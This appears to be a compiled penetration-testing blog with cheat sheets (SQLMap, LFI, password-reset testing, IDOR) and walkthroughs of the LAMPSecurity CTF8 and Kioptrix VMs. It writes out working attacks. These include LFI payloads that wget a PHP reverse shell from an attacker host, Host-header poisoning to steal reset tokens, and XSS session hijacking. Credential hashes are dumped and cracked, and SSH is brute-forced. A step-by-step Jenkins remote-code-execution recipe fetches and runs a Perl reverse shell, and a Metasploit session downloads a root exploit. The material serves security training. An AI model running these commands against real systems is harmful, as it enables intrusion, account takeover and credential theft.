`# show running-config`	Show running config loaded in memory
`# show startup-config`	Show sartup config
`# show version`	show cisco IOS version
`# show session`	display open sessions
`# show ip interface`	Show network interfaces
`# show interface e0`	Show detailed interface info
`# show ip route`	Show routes
`# show access-lists`	Show access lists
`# dir file systems`	Show available files
`# dir all-filesystems`	File information
`# dir /all`	SHow deleted files
`# terminal length 0`	No limit on terminal output
`# copy running-config tftp`	Copys running config to tftp server
`# copy running-config startup-config`	Copy startup-config to running-config

Cryptography

Hash Lengths

Hash	Size
MD5 Hash Length	`16 Bytes`
SHA-1 Hash Length	`20 Bytes`
SHA-256 Hash Length	`32 Bytes`
SHA-512 Hash Length	`64 Bytes`

Hash Examples

Likely just use hash-identifier for this but here are some example hashes:

Hash	Example
MD5 Hash Example	`8743b52063cd84097a65d1633f5c74f5`
MD5 $PASS:$SALT Example	`01dfae6e5d4d90d9892622325959afbe:7050461`
MD5 $SALT:$PASS	`f0fda58630310a6dd91a7d8f0a4ceda2:4225637426`
SHA1 Hash Example	`b89eaac7e61417341b710b727768294d0e6a277b`
SHA1 $PASS:$SALT	`2fc5a684737ce1bf7b3b239df432416e0dd07357:2014`
SHA1 $SALT:$PASS	`cac35ec206d868b7d7cb0b55f31d9425b075082b:5363620024`
SHA-256	`127e6fbfe24a750e72930c220a8e138275656b 8e5d8f48a98c3c92df2caba935`
SHA-256 $PASS:$SALT	`c73d08de890479518ed60cf670d17faa26a4a7 1f995c1dcc978165399401a6c4`
SHA-256 $SALT:$PASS	`eb368a2dfd38b405f014118c7d9747fcc97f4 f0ee75c05963cd9da6ee65ef498:560407001617`
SHA-512	`82a9dda829eb7f8ffe9fbe49e45d47d2dad9 664fbb7adf72492e3c81ebd3e29134d9bc 12212bf83c6840f10e8246b9db54a4 859b7ccd0123d86e5872c1e5082f`
SHA-512 $PASS:$SALT	`e5c3ede3e49fb86592fb03f471c35ba13e8 d89b8ab65142c9a8fdafb635fa2223c24e5 558fd9313e8995019dcbec1fb58414 6b7bb12685c7765fc8c0d51379fd`
SHA-512 $SALT:$PASS	`976b451818634a1e2acba682da3fd6ef a72adf8a7a08d7939550c244b237c72c7d4236754 4e826c0c83fe5c02f97c0373b6b1 386cc794bf0d21d2df01bb9c08a`
NTLM Hash Example	`b4b9b02e6f09a9bd760f388b67351e2b`

SQLMap Examples

A mini SQLMap cheat sheet, see our full SQLMap cheat sheet for more commaands:

Command	Description
`sqlmap -u http://meh.com --forms --batch --crawl=10 --cookie=jsessionid=54321 --level=5 --risk=3`	Automated sqlmap scan
`sqlmap -u TARGET -p PARAM --data=POSTDATA --cookie=COOKIE --level=3 --current-user --current-db --passwords --file-read="/var/www/blah.php"`	Targeted sqlmap scan
`sqlmap -u "http://meh.com/meh.php?id=1" --dbms=mysql --tech=U --random-agent --dump`	Scan url for union + error based injection with mysql backend and use a random user agent + database dump
`sqlmap -o -u "http://meh.com/form/" --forms`	sqlmap check form for injection
`sqlmap -o -u "http://meh/vuln-form" --forms -D database-name -T users --dump`	sqlmap dump and crack hashes for table users on database-name.

Document Changelog

Last Updated: 01/06/2024 (01th of June 2024)
Author: Dhruv Ambaliya
Notes: Reviewed content is current for various tools.

Previous document changes:

16/03/2024 - fixed some formatting issues.
17/04/2024 - Article updated, added loads more content, VPN, DNS tunneling, VLAN hopping etc - check out the TOC below.

LFI Cheat Sheet

Dhruv Ambaliya — Sun, 26 May 2024 11:29:10 +0000

What is an LFI Vulnerability?
How to get a Shell from LFI
fimap LFI Pen Testing Tool
- fimap + phpinfo() Exploit

What is an LFI Vulnerability?

LFI stands for Local File Includes - it’s a file local inclusion vulnerability that allows an attacker to include files that exist on the target web server. Typically this is exploited by abusing dynamic file inclusion mechanisms that don’t sanitize user input.

Scripts that take filenames as parameters without sanitizing the user input are good candidates for LFI vulnerabilities, a good example would be the following PHP script foo.php?file=image.jpg which takes image.jpg as a parameter. An attacker would simply replace image.jpg and insert a payload. Normally a directory traversal payload is used that escapes the script directory and traverses the filesystem directory structure, exposing sensitive files such as foo.php?file=../../../../../../../etc/passwd or sensitive files within the web application itself. Exposing sensitive information or configuration files containing SQL usernames and passwords.

Note: In some cases, depending on the nature of the LFI vulnerability it’s possible to run system executables.

How to get a Shell from LFI

Below are some techniques I’ve used in the past to gain a shell on systems with vulnerable LFI scripts exposed.

Path Traversal aka Directory Traversal

As mentioned above Traverse the filesystem directory structure to disclose sensitive information about the system that can help you gain a shell, usernames / passwords etc.

PHP Wrapper expect:// LFI

Allows execution of system commands via the php expect wrapper, unfortunately this is not enabled by default.

An example of PHP expect:

http://127.0.0.1/fileincl/example1.php?page=expect://ls

Below is the error received if the PHP expect wrapper is disabled:

Warning: include(): Unable to find the wrapper "expect" - did you forget to enable it when you<br> configured PHP? in /var/www/fileincl/example1.php on line 7 Warning: include(): Unable to find the<br> wrapper "expect" - did you forget to enable it when you configured PHP? in <br> /var/www/fileincl/example1.php on line 7 Warning: include(expect://ls): failed to open stream: No such file or directory in /var/www/fileincl/example1.php on line 7 Warning: include(): Failed opening 'expect://ls' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/fileincl/example1.php on line 7

PHP Wrapper php://file

Another PHP wrapper, php://input your payload is sent in a POST request using curl, burp or hackbar to provide the post data is probably the easiest option.

Example:

http://192.168.183.128/fileincl/example1.php?page=php://input

Post Data payload, try something simple to start with like: <? system('uname -a');?>

Then try and download a reverse shell from your attacking machine using:

<? system('wget http://192.168.183.129/php-reverse-shell.php -O /var/www/shell.php');?>

After uploading execute the reverse shell at http://192.168.183.129/shell.php

PHP Wrapper php://filter

Another PHP wrapper, php://filter in this example the output is encoded using base64, so you’ll need to decode the output.

http://192.168.155.131/fileincl/example1.php?page=php://filter/convert.base64-encode/resource=../../../../../etc/passwd

/proc/self/environ LFI Method

If it’s possible to include /proc/self/environ from your vulnerable LFI script, then code execution can be leveraged by manipulating the User Agent parameter with Burp. After the PHP code has been introduced /proc/self/environ can be executed via your vulnerable LFI script.

/proc/self/fd/ LFI Method

Similar to the previous /proc/self/environ method, it’s possible to introduce code into the proc log files that can be executed via your vulnerable LFI script. Typically you would use burp or curl to inject PHP code into the referer.

This method is a little tricky as the proc file that contains the Apache error log information changes under /proc/self/fd/ e.g. /proc/self/fd/2, /proc/self/fd/10 etc. I’d recommend brute forcing the directory structure of the /proc/self/fd/ directory with Burp Intruder + FuzzDB’s LFI-FD-Check.txt list of likely proc files, you can then monitor the returned page sizes and investigate.

fimap LFI Pen Testing Tool

fimap is a tool used on pen tests that automates the above processes of discovering and exploiting LFI scripts. Upon discovering a vulnerable LFI script fimap will enumerate the local filesystem and search for writable log files or locations such as /proc/self/environ. Another tool commonly used by pen testes to automate LFI discovery is Kali’s dotdotpwn, which works in a similar way.

fimap + phpinfo() Exploit

Fimap exploits PHP’s temporary file creation via Local File Inclusion by abusing PHPinfo() information disclosure glitch to reveal the location of the created temporary file.

If a phpinfo() file is present, it’s usually possible to get a shell, if you don’t know the location of the phpinfo file fimap can probe for it, or you could use a tool like OWASP DirBuster.

Enjoy.

HowTo: Kali Linux Chromium Install for Web App Pen Testing

Dhruv Ambaliya — Fri, 24 May 2024 11:29:10 +0000

Why use Chromium for Web Application Testing ?
Kali Install Chromium Browser
Chromium Won’t Launch on Kali
Chromium Setup for Web Application Testing
Complete Chromium Config
Kali Chromium Error: You Are using an Unsupported Command line flag –disable-web-security. Security and Stability will suffer

Why use Chromium for Web Application Testing ?

The primary reason I use Chromium is for DOM based XSS testing which as far as I know cannot be disabled in Firefox. If you have never heard of Chromium it’s the opensource version of Google Chrome and doesn’t have flash player built in and various other codecs such as: AAC, H.264, and MP3 Support.

It’s possible to disable all security features in Chromium or Chrome using the switch --disable-web-security, this will disable all security options and allow you to test for DOM based XSS.

Kali Install Chromium Browser

Chromium exists within the Kali repositories and can be installed using:

apt-get install chromium

Chromium Won’t Launch on Kali

By default chromium won’t launch on Kali Linux, this is due to chromium running as the root user. You can fix this by opening /etc/chromium.d/default-flags in vim and adding the following lines:

# Run as root Kali
export CHROMIUM_FLAGS="$CHROMIUM_FLAGS --password-store=detect --no-sandbox --user-data-dir"

This disables the user-data-dir and sandboxing, disabling sandboxing will have some obvious security issues but this browser is for web application penetration testing only.

Chromium Setup for Web Application Testing

In order to use chromium for Web Application Penetration Testing you need to disable all the security features, allowing for DOM based XSS testing in chromium.

# Disable Chromium security features for web app testing
export CHROMIUM_FLAGS="$CHROMIUM_FLAGS --disable-web-security"

Complete Chromium Config

What my entire Chromium config looks like:

# A set of command line flags that we want to set by default.

# Do not hide any extensions in the about:extensions dialog
export CHROMIUM_FLAGS="$CHROMIUM_FLAGS --show-component-extension-options"

# Don't use the GPU blacklist (bug #802933)
export CHROMIUM_FLAGS="$CHROMIUM_FLAGS --ignore-gpu-blacklist"

# Run as root Kali
export CHROMIUM_FLAGS="$CHROMIUM_FLAGS --password-store=detect --no-sandbox --user-data-dir"

# Disable Chromium security features for web app testing
export CHROMIUM_FLAGS="$CHROMIUM_FLAGS --disable-web-security"

Kali Chromium Error: You Are using an Unsupported Command line flag –disable-web-security. Security and Stability will suffer

Ignore the following error, Chromium still process DOM based XSS. The same error occurs in Google Chrome.

Enjoy.

Password Reset Testing Cheat Sheet

Dhruv Ambaliya — Wed, 15 May 2024 03:29:10 +0000

Header Poisoning
- Host: Header Injection Password Reset URL
Password Reset Token Filter Bypass
Email Parameter Manipulation
- Password Change Functions
  - Intercept & Change the Email
- Password Reset Functons
  - Add Second Email
Password Token Referral Header Leak
Check List

The following document outlines some key techniques used when assessing password reset function on modern web application and API’s, a useful resource for bug bounty hunters and penetration testers when performing password reset security testing.

Header Poisoning

Host: Header Injection Password Reset URL

The following headers can be modified in an attempt to modify the password reset token URL to an attacker controlled domain. Potentially allowing an attacker to obtain the reset token when a user clicks the link to perform a password reset.

Potential Vulnerable Headers

Host Header Password Reset

Replace the Host: header with a server you control.

 
Host: attackers-domain.com

Double Host Header

Often when you modify the Host header the application, or WAF fails to the process the request, a technique which can potentially bypass this filter if to simply add a second Host header to the request.

Host: target.com
Host: attackers-domain.com

X-Forwarded-Host Header

Add an attacker controlled domain in the X-forwarded-Host header directive.

Host: target.com 
X-Forwarded-Host: attackers-domain.com

Confirm Vulnerable

Perform a password reset normally, and modify the host header with a different url
Check the email sent by the application has the test url, not the applications url

PoC

Replace vulnerable header with the attacker controlled domain
Send the request
Wait for the victim to click reset link (or show PoC to a second account)
Exatract the token from the webserver logs you control
Use the extracted token to take over the user account

Password Reset Token Filter Bypass

If the app is built on ruby, try adding a .json extension to the end of the password reset URL. In certain circumstances ACL bugs may exist, adding the extension could potentially bypass any additional layers of protection the application has in in place.

Add a .json to the reset token
Observe the applications response to see if the

Email Parameter Manipulation

Password Change Functions

Intercept & Change the Email

Interecept the request, and replace the email address to one that you control

Password Reset Functons

Add Second Email

Vulnerable applications can be manipulated to send password reset codes to multiple email addresses.

Interecept the request, and add a second email address to the request

&
%20
|
%0a%0dcc:
%0a%0dbcc:

Modify the parameter matching the applications format, example:

 
email="victim@mail.tld",email="attacker@mail.tld"

Match the API Request Schema

Match the application / API's request formatting when adding the additional email address.

Password Token Referral Header Leak

Vulnerable applications leak the password reset URL via the referal header.

Assess the target using an intercepting proxy to identify if the referral header leaks the token through the referral header.

Check List

Host Header Injection Password Reset Function
Double Host Header Injection Password Reset Function
X-Forwarded-Host Header Injection Password Reset Function
Email Parameter Manipulation add attacker controller second email address

Enjoy.

LAMP Security CTF8 - Walkthrough

Dhruv Ambaliya — Sun, 05 May 2024 11:00:59 +0000

Difficulty Rating:

Author Description
Enumeration
- Host Service Enumeration
Inspection of the Web Application
XSS Session ID Hijacking
Reverse Shell
- Drupal settings.php
Hashcat MD5 cracking
Hydra SSH Brute Force
SSH Account Compromise
Local Privilege Escalation

Author Description

The LAMPSecurity project is an effort to produce training and benchmarking tools that can be used to educate information security professionals and test products.

Author: madirish2600

Download: VulnHub

Enumeration

nmap -v -p 1-65535 -sV -O -sT 192.168.30.135

Dislcaimer: Multiple Entry Points

The LAMPSecurity series is not particularly challenging, for each VM in the series I've targeted the web application as the entry point.

Host Service Enumeration

Port	Service	Version Detection
`TCP: 21`	FTP	vsftpd 2.0.5
`TCP: 22`	SSH	OpenSSH 4.3 (protocol 2.0)
`TCP: 25`	SMTP	Sendmail
`TCP: 80`	HTTP	Apache httpd 2.2.3 ((CentOS))
`TCP: 110`	POP3	Dovecot pop3d
`TCP: 111`	rpcbind	N/A
`TCP: 139`	Netbios	Samba smbd 3.X (workgroup: WORKGROUP)
`TCP: 143`	IMAP	Dovecot imapd
`TCP: 443`	HTTPS	Apache httpd 2.2.3 ((CentOS))
`TCP: 445`	Netbios	Samba smbd 3.X (workgroup: WORKGROUP)
`TCP: 938`	TCP	N/A
`TCP: 993`	IMAP SSL	Dovecot imapd
`TCP: 995`	POP3 SSL	Dovecot pop3d
`TCP: 3306`	MySQL	MySQL (unauthorized)
`TCP: 5801-5804`	VNC HTTP	RealVNC 4.0 (resolution: 400x250; VNC TCP port: 5901)
`TCP: 5901-5904`	VNC	VNC (protocol 3.8)
`TCP: 6001-6004`	X11	X11

Inspection of the Web Application

As with the previous CTF series VM’s, I’ve chosen to ignore other entry points and focus on the web application is used for the entry point.

Inspection of the web application revealed it was vulnerable to XSS (Cross Site Scripting):

Confirmed:

XSS Session ID Hijacking

From insepecting the web application it appeared Barbara was an admin, a guess based on her user activity. A XSS comment was placed on one of the pages Barbara had created and an email was sent to Barbara instructing her to view the page.

The XXS script will execute and attempt to contact a web server on the attacking machine, the url will disclose Barbara’s session ID.

Once the ID has been obtained, Cookie Manager+ Firefox plugin or Burp Suite is used to manipulate the stored cookie and replace the session ID with Barbara’s, hijacking Barbara’s session.

XSS Comment

Joomla required a user to preview a comment before saving, in this case the XSS executes and Joomla fails to save the comment. To evade this behavior, a normal comment was posted, then edited to include the XSS snipet.

HTTP Server

A HTTP server was setup on attacking machine: python -m SimpleHTTPServer 80

Email Barbara (victim)

After a couple of minutes the following appeared in the web server logs:

192.168.221.135 - - [05/05/2014 10:54:28] "GET
/?SESS2130d5ef479afc30ab5b3f3d50bbfc5e=9ehlga5fhnh8o81om1aq5so040;%20has_js=1
HTTP/1.1" 301 -

Barbaras Session ID: 9ehlga5fhnh8o81om1aq5so040

Swapped Session ID Burp Suite

Cookie Manager+ and / or Tamper Data can also be used for this purpose.

Successfuly logged in as Barbara:

Reverse Shell

A reverse shell was injected into a new page using Barbara’s admin account:

Drupal settings.php

The following disclosed settings.php file for Drupal existed.

File path: /var/www/html/drupal/sites/default/settings.php

The file contained the root account credentials for mysql.

*/

$db_url = 'mysqli://root:JumpUpAndDown@localhost/drupal';

$db_prefix = '';

The following SQL was used to disclose the password hashes:

/bin/sh -i

sh: no job control in this shell

sh-3.2$ mysql -u root -p drupal
Enter password: JumpUpAndDown
select name,pass from users;
/q
admin     49265c16d1dff8acef3499bd889299d6
Barbara     bed128365216c019988915ed3add75fb
Jim     2a5de0f53b1317f7e36afcdb6b5202a4
Steve     08d15a4aef553492d8971cdd5198f314
Sherry     c3319d1016a802db86653bcfab871f4f
Gene     9b9e4bbd988954028a44710a50982576
Harvey     7d29975b78825ea7c27f5c0281ea2fa4
John     518462cd3292a67c755521c1fb50c909
Johnathan     6dc523ebd2379d96cc0af32e2d224db0
Susan     0d42223010b69cab86634bc359ed870b
Dan     8f75ad3f04fc42f07c95e2f3d0ec3503
George     ed2b1f468c5f915f3f1cf75d7068baae
Jeff     ca594f739e257245f2be69eb546c1c04
Stacey     85aca385eb555fb6a36a62915ddd8bc7
Juan     573152cc51de19df50e90b0e557db7fe
Michael     c7a4476fc64b75ead800da9ea2b7d072
Jerome     42248d4cb640a3fb5836571e254aee2b
Tom     971dcf53e88e9268714d9d504753d347
Xavier     3005d829eb819341357bfddf541c175b
Sally     7a1c07ff60f9c07ffe8da34ecbf4edc2
Latte     42a7ccabfaea30678d6f1b80876773ef

Hashcat MD5 cracking

Hashcat wased to crack the hashes offline:

[root:~]# hashcat --username -m 0 -a 0 ctf8-hashes.txt
/usr/share/wordlists/rockyou.txt

Hydra SSH Brute Force

Hyrda was used to brute force SSH using the previously cracked password hashes:

[DATA] attacking service ssh on port 22

[22][ssh] host: 192.168.221.135   login: jharraway   password: letmein!
[22][ssh] host: 192.168.221.135   login: spinkton   password: football123
[22][ssh] host: 192.168.221.135   login: bdio   password: passw0rd
[STATUS] 167.00 tries/min, 167 tries in 00:01h, 53 todo in 00:01h, 5 active

SSH Account Compromise

[root:~]# ssh spinkton@192.168.221.135

Welcome to LAMPSecurity Research SSH access!

#flag#5e937c51b852e1ee90d42ddb5ccb8997

Unauthorized access is expected...

spinkton@192.168.221.135's password:
Last login: Thu Mar 27 12:48:29 2014 from 192.168.56.1
#flag#motd-flag

Local Privilege Escalation

[spinkton@localhost ~]$ sudo -s

Password:

[root@localhost ~]# id

uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
context=user_u:system_r:unconfined_t

Thanks for the VM :)

Insecure Direct Object Reference (IDOR): Definition, Examples & How to Find

Dhruv Amabaliya — Wed, 01 May 2024 11:29:10 +0000

What is an Insecure Direct Object Reference (IDOR) Vulnerability?

What is a Insecure Direct Object Reference (IDOR) Vulnerability? In the most basic form an IDOR is an object referenced within a web appliation without the correct controls in place to prevent an unauthorised user directly access, either via enumeration or guessing / predicting the object. IDOR vulnerabilties typically occur when the access control mechanism uses a user-controlled parameter value, that is used to access functionality or reasources directly. Typically this uses a numeric or predictible parameter value, that an attacker or malicious user could predict, brute force and then manipulate to gain access to data and/or functionality that was not intended.

How To Pronounce IDOR

IDOR is typically pronounced eye-door - this is arguably the most important piece of information in the whole document :)

What is an Insecure Direct Object Reference (IDOR) Vulnerability?
Insecure Direct Object Reference (IDOR) Examples
IDOR Example: Direct Database Reference
IDOR Example: File Name
How To Find IDOR Vulnerabilties
IDOR Entry Points
IDOR Example: File Name
Finding Access Control Bug (IDOR)
IDOR vs Forced Browsing: What’s the Difference?

Insecure Direct Object Reference (IDOR) Examples

The following documents some IDOR examples, where the access control mechanism is vulnerable due to a user-controlled parameter value, that is used to access functionality or reasources directly. Typically a numeric or predictible parameter value, that an attacker or malicious user could manipulate.

IDOR Example: Direct Database Reference

A typical numeric IDOR vulnerable function would look like:

foo.com/profile/user_id=7747

If the user_id parameter is vulnerable to IDOR an attacker could simply modify the numeric value and access another users profile. If successful an attacker could gain access to a user acverticalcount profile and potentially perform horizontal, or vertical privilege escalation against the vulnerable application.

IDOR Example: File Name

Another typical example of an IDOR vulnerability would be file names with a predictable value that could be bruteforced, guessed or predicted if sequential, such as:

foo.com/download/12432-secure-document.pdf

If the file name is vulnerable to IDOR an attacker could simply predict or bruteforce the numeric value and access another users file. If successful an attacker could potentially gain access to the document.

How To Find IDOR Vulnerabilties

This document walks through some potential techniques on how to find IDOR vulnerabilities witin vulnerable web applications. Due to the manual process of building and implimenting access control systems, mistakes could be made (human error). Unfortunately, identifying IDOR vulnerabilities is typically best done manually.

IDOR Entry Points

Assess the application for predictable parameters or URL’s, some food for thought:

Profile URL’s or ID’s
Password reset functions (great for privilege escalation)
Numeric parameters
Predictable parameters

foo.com/profile/user_id=7747

IDOR Example: File Name

Another typical example of an IDOR vulnerability would be file names with a predictable value that could be bruteforced, guessed or predicted if sequential, such as:

foo.com/download/12432-secure-document.pdf

Finding Access Control Bug (IDOR)

You could argue that strictly speaking this is not an IDOR bug, however (call it what you want to call it), either way it is still an issue.

Using BurpSuite or another similar tool, browse the application as a user or ideally a privileged user account
Authenticate as another user account, or an account with lower priveleges - and obtain a session identifier (token/cookie)
Use the session identifier obtained during step 2 against the URL’s from step 1

Web Server Response Codes Lie

Do not depend solely on response codes, many web applications respond with incorrect response codes.

IDOR vs Forced Browsing: What’s the Difference?

Forced browsing and IDOR vulnerabilties are very similar access control vulnerabilities. The main thing that seperates the vulnerabilties is the method of discovery is typically bruteforcing URL’s for forced browsing e.g. with a large word list and IDOR detection is typically discovered by brute forcing predicatable parameters.

Jenkins RCE via Unauthenticated API

Dhruv Ambaliya — Thu, 18 Apr 2024 10:08:10 +0000

Description:
Tested Versions
Tested Operating Systems
Instructions
More info about Jenkins
More Resources

Description:

Jenkins (continuous intergration server) default install allows for unauthenticated access to the API on the Jenkins Master Server (default behavour). Allowing unauthenticated access to the groovy script console, allowing an attacker to execute shell commands and / or connect back with a reverse shell.

DISCLAIMER

Disclaimer, I didn't discover this exploit, it has been discovered before... This vulnerability has been disclosed before to the Jenkins CI developers, who do not consider it a vulnerability.

Tested Versions

Software	Version
`Jenkins`	Ver 1.626
`Jenkins`	Ver 1.638

Tested Operating Systems

An effort to test all affected OS’s, showing the severity of the exploit (e.g. jenkins shell) for the default OS packaged version.

Operating System	Default Package Expoit
`CentOS 6 - Jenkins RPM via Jenkins YUM Repo`	shell as user jenkins

Instructions

This is really basic, I made a few small groovy scripts to execute the shell commands I wanted via Jenkins API (I recall having some issues runing more than one command at a time via groovy), I then executed them using Curl.

groovy script wget shell

Script to wget perl reverse shell to target and copy it to /tmp/shell.

   def command = "wget http://192.168.145.128/perl-reverse-shell.pl -O /tmp/shell"
   def proc = command.execute()
   proc.waitFor()

   println "Process exit code: ${proc.exitValue()}"
   println "Std Err: ${proc.err.text}"
   println "Std Out: ${proc.in.text}"

Jenkins requires /tmp to have exec perms

By default Jenkins requires /tmp to have the execute mount option set, so you should be safe to land shells there on Jenkins servers.

groovy script execute shell command

    def command = "perl /tmp/shell"
    def proc = command.execute()
    proc.waitFor()              

    println "Process exit code: ${proc.exitValue()}"
    println "Std Err: ${proc.err.text}"
    println "Std Out: ${proc.in.text}"

Execute the Groovy Scripts via scriptText Jenkins API

curl -d "script=$(<./wget.groovy)" -X POST http://192.168.30.130:8080/scriptText
curl --data-urlencode  "script=$(<./execute.groovy)" -X POST http://192.168.30.130:8080/scriptText

Get Shell

    [root:~/pwn-jenkins]# nc -v -n -l -p 443
    listening on [any] 443 ...
    connect to [192.168.30.128] from (UNKNOWN) [192.168.30.130] 42340
     21:16:17 up 15:17,  1 user,  load average: 0.23, 0.31, 0.17
     USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
     root     tty1     -                05:59    3:40   0.12s  0.12s -bash
     Linux localhost.localdomain 2.6.32-573.3.1.el6.x86_64 #1 SMP Thu Aug 13 22:55:16 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
     uid=498(jenkins) gid=499(jenkins) groups=499(jenkins) context=unconfined_u:system_r:unconfined_java_t:s0
     /
     apache: cannot set terminal process group (-1): Invalid argument
     apache: no job control in this shell
     apache-4.1$ whoami
     whoami
     jenkins
     apache-4.1$ id
     id
     uid=498(jenkins) gid=499(jenkins) groups=499(jenkins) context=unconfined_u:system_r:unconfined_java_t:s0
     apache-4.1$

Jenkins Does Not Consider this a Vulnerability

Dispite the fact the web application is insecure by default (the default install leaves the API and webapp exposed without authentication), Jenkins do not consider this a vulnerability. Your best option is to configure authentication by following the Securing Jenkinsi Guide

More info about Jenkins

Jenkins is a tool consisting of a master and a slave, the master server schedules and runs jobs for the jenkins slaves to execute. The default installation configures the master as a slave server, allowing anyone with access to the Jenkins master to execute arbitrary code on the master (via the slave).

A more secure solution would be isolating the role of the master server. Currently if a Jenkins master server is compromised, it’s likely an attacker will also be able to execute jobs / run shell scripts on the Jenkins slaves.

An additional ACL option within Matrix-based security to disable API, and another for script console / execution on the Jenkins Master would be a good idea. Currently the only options is to disable all script access for the user/group, which appears to include the slaves.

Be mindful of the fact that, by giving access to the slaves via the Jenkins Master, you’re essentially giving the user shell level access to the slave (or at least the ability to execute shell commands on the slave machine).

More Resources

More links about this vuln and similar Jenkins vulns below:

http://www.rapid7.com/db/modules/exploit/multi/http/jenkins_script_console

Kioptrix Level 2014 Walkthrough

Dhruv Ambaliya — Mon, 15 Apr 2024 14:00:10 +0000

Difficulty Rating:

Author Description
Service Enumeration
Web Application Interrogation
Non Privileged Shell
Local Privilege Escalation

Author Description

The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games are to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more ways then one to successfully complete the challenges.

Service Enumeration

Port	Service	Version Detection
`TCP: 80`	HTTP	Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
`TCP: 8080`	HTTP	Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)

Web Application Interrogation

http://192.168.221.159:8080/ rendered a page 403 forbidden page. The Firefox UserAgent switcher was leveraged to change the browser to IE 6, exposing the web application PHPTAX (this took a while to figure out!):

Non Privileged Shell

Research discovered a metasploit module existed for phptax:

msf > use exploit/multi/http/phptax_exec
msf exploit(phptax_exec) > set RHOST 192.168.221.159
RHOST => 192.168.221.159
msf exploit(phptax_exec) > set RPORT 8080
RPORT => 8080
msf exploit(phptax_exec) > set TARGETURI /phptax/
TARGETURI => /phptax/
msf exploit(phptax_exec) > show options

Module options (exploit/multi/http/phptax_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      192.168.221.159  yes       The target address
   RPORT      8080             yes       The target port
   TARGETURI  /phptax/         yes       The path to the web application
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   PhpTax 0.8


msf exploit(phptax_exec) > run

[*] [2016.01.07-08:20:41] Started reverse double handler
[*] [2016.01.07-08:20:41] 192.168.221.1598080 - Sending request...
[*] [2016.01.07-08:20:42] Accepted the first client connection...
[*] [2016.01.07-08:20:42] Accepted the second client connection...
[*] [2016.01.07-08:20:42] Accepted the first client connection...
[*] [2016.01.07-08:20:42] Accepted the second client connection...
[*] [2016.01.07-08:20:42] Command: echo GiSakqCyBJv7ZAuW;
[*] [2016.01.07-08:20:42] Writing to socket A
[*] [2016.01.07-08:20:42] Writing to socket B
[*] [2016.01.07-08:20:42] Reading from sockets...
[*] [2016.01.07-08:20:42] Command: echo 4yauS5V9QPhhcobv;
[*] [2016.01.07-08:20:42] Writing to socket A
[*] [2016.01.07-08:20:42] Writing to socket B
[*] [2016.01.07-08:20:42] Reading from sockets...
[*] [2016.01.07-08:20:43] Reading from socket B
[*] [2016.01.07-08:20:43] B: "GiSakqCyBJv7ZAuW\r\n"
[*] [2016.01.07-08:20:43] Matching...
[*] [2016.01.07-08:20:43] A is input...
[*] [2016.01.07-08:20:43] Reading from socket B
[*] [2016.01.07-08:20:43] B: "4yauS5V9QPhhcobv\r\n"
[*] [2016.01.07-08:20:43] Matching...
[*] [2016.01.07-08:20:43] A is input...
[*] Command shell session 1 opened (192.168.221.162:4444 -> 192.168.221.159:45072) at 2016-01-07 08:20:43 -0500
[*] Command shell session 2 opened (192.168.221.162:4444 -> 192.168.221.159:62420) at 2016-01-07 08:20:43 -0500

id
uid=80(www) gid=80(www) groups=80(www)

Local Privilege Escalation

The binary fetch was used to download a FreeBSD 9.0-9.1 mmap/ptrace - Privilege Escalation Exploit, fetch was used as the target didn’t contain the usual binaries for file download (wget, curl, etc).

wget
wget: not found

curl
curl: not found

fetch -o exploit http://192.168.221.162:45/26368
exploit                                               2215  B   32 MBps

mv exploit exploit.c
gcc exploit.c -o exploit
./exploit

id
uid=0(root) gid=0(wheel) egid=80(www) groups=80(www)
/bin/sh -i
sh: can't access tty; job control turned off
# cd /root
# ls
.cshrc
.history
.k5login
.login
.mysql_history
.profile
congrats.txt
folderMonitor.log
httpd-access.log
lazyClearLog.sh
monitor.py
ossec-alerts.log
# cat congrats.txt
If you are reading this, it means you got root (or cheated).
Congratulations either way...

Hope you enjoyed this new VM of mine. As always, they are made for the beginner in
mind, and not meant for the seasoned pentester. However this does not mean one
can't enjoy them.

As with all my VMs, besides getting "root" on the system, the goal is to also
learn the basics skills needed to compromise a system. Most importantly, in my mind,
are information gathering & research. Anyone can throw massive amounts of exploits
and "hope" it works, but think about the traffic.. the logs... Best to take it
slow, and read up on the information you gathered and hopefully craft better
more targetted attacks.

For example, this system is FreeBSD 9. Hopefully you noticed this rather quickly.
Knowing the OS gives you any idea of what will work and what won't from the get go.
Default file locations are not the same on FreeBSD versus a Linux based distribution.
Apache logs aren't in "/var/log/apache/access.log", but in "/var/log/httpd-access.log".
It's default document root is not "/var/www/" but in "/usr/local/www/apache22/data".
Finding and knowing these little details will greatly help during an attack. Of course
my examples are specific for this target, but the theory applies to all systems.

As a small exercise, look at the logs and see how much noise you generated. Of course
the log results may not be accurate if you created a snapshot and reverted, but at least
it will give you an idea. For fun, I installed "OSSEC-HIDS" and monitored a few things.
Default settings, nothing fancy but it should've logged a few of your attacks. Look
at the following files:
/root/folderMonitor.log
/root/httpd-access.log (softlink)
/root/ossec-alerts.log (softlink)

The folderMonitor.log file is just a cheap script of mine to track created/deleted and modified
files in 2 specific folders. Since FreeBSD doesn't support "iNotify", I couldn't use OSSEC-HIDS
for this.
The httpd-access.log is rather self-explanatory .
Lastly, the ossec-alerts.log file is OSSEC-HIDS is where it puts alerts when monitoring certain
files. This one should've detected a few of your web attacks.

Feel free to explore the system and other log files to see how noisy, or silent, you were.
And again, thank you for taking the time to download and play.
Sincerely hope you enjoyed yourself.

Be good...


loneferret
http://www.kioptrix.com


p.s.: Keep in mind, for each "web attack" detected by OSSEC-HIDS, by
default it would've blocked your IP (both in hosts.allow & Firewall) for
600 seconds. I was nice enough to remove that part :)

Thanks for the VM :)

ADB Commands Cheat Sheet - Flags, Switches & Examples Tutorial

Dhruv Ambaliya — Sat, 06 Apr 2024 05:37:10 +0000

What is adb?

